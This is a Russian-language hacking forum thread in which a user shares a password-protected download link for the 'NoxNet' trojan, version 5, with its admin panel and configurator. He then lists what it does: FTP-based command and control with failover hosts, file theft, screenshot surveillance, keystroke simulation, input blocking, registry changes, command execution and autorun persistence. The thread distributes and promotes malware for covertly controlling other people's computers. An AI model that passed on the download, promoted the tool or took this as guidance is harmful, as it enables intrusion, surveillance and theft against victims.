NoxNet trojan

MORDAN

Клоун
Messages
71
Reputation
17
Reaction score
39
Points
18
Please note, if you want to make a deal with this user, that it is blocked.
http://www.sendspace.com/file/ypilo5

password elite1337

Внутри админка, конфигуратор и сам трой. Куплен был мною у автора. Инструкция не прилагается.
 

MORDAN

Клоун
Messages
71
Reputation
17
Reaction score
39
Points
18
Please note, if you want to make a deal with this user, that it is blocked.
Наименование: NoXNeT
Версия: 5
Платформа: .Net 2

Данное ПО включает в себя:[/B]
Серверную часть
Клиентскую часть
Конфигуратор

Работает посредством FTP
Нет привязки к DNS, можете указать сколько хотите хостов, при выходе из строя одного серверная часть программы автоматически переключится на следующий сервер

Принцип работы:
После запуска серверной части на ведомом компьютере, администратор заходит в админку и дает команды, команды можно задавать как вручную, так и посредством соответствующих элементов управления в GUI клиентской части.
Списки команд можно сохранять/загружать и тд
Каждому ведомому компьютеру дается уникальный идентификатор, посредством которого можно обращаться к определенному компьютеру
На хосте сохраняется полный лог работы серверной части, вида:
15.01.2010 12:29:34 Get File True

Возможности:
Скачать файл
Скачать файлы по расширению
Закачать файл
Запустить файл
Удалить файла
Создать директории
Удалить директории
Переименовать директорию
Переименовать файл
Сфоткать монитор
Создать ZIP
Убить процесс
Выключение себя
Вырубить комп
Иммитация нажатий клавиш
Получение информации о компе/файле/папке\
Уснуть на некоторое время
Найти и скачать файл
Назначить на автозапуск
Копировать файл
Копировать директорию
Задание интервала между запросами
Получить информацию о накопителях
Получить список процессов
Получить информацию о себе
Удалить файлы по расширению
Блокировать устройства ввода
Установить значение ключа реестра
Прочитать значение ключа реестра
Выполнить в командной строке
Сменить рабочую кодировку
Назначить атрибут
Наблюдение посредством создания скриншотов


Приведенные функции являются базовыми, посредством их комбинирования можно добиться куда большего функционала

Прием и передача команд осуществляется в зашифрованном виде, так что даже если злоумышленник получит доступ к вашим серверам он не сможет дать команды или прочитать ранее заданные

Запустив на разных машинах один и тот же файл вы получаете возможность управлять каждым из компьютеров на которых находится данная программа

Проверка на вирусы:http://www.virustotal.com/ru/analisis/fbf48aed22ecf8e32f78f470fbdba2fac5a2e12333748184c0 b7610cd061472e-1263757930
 
  • Like
Reactions: ob00m

    ob00m

    Points: 1
    No comments
Top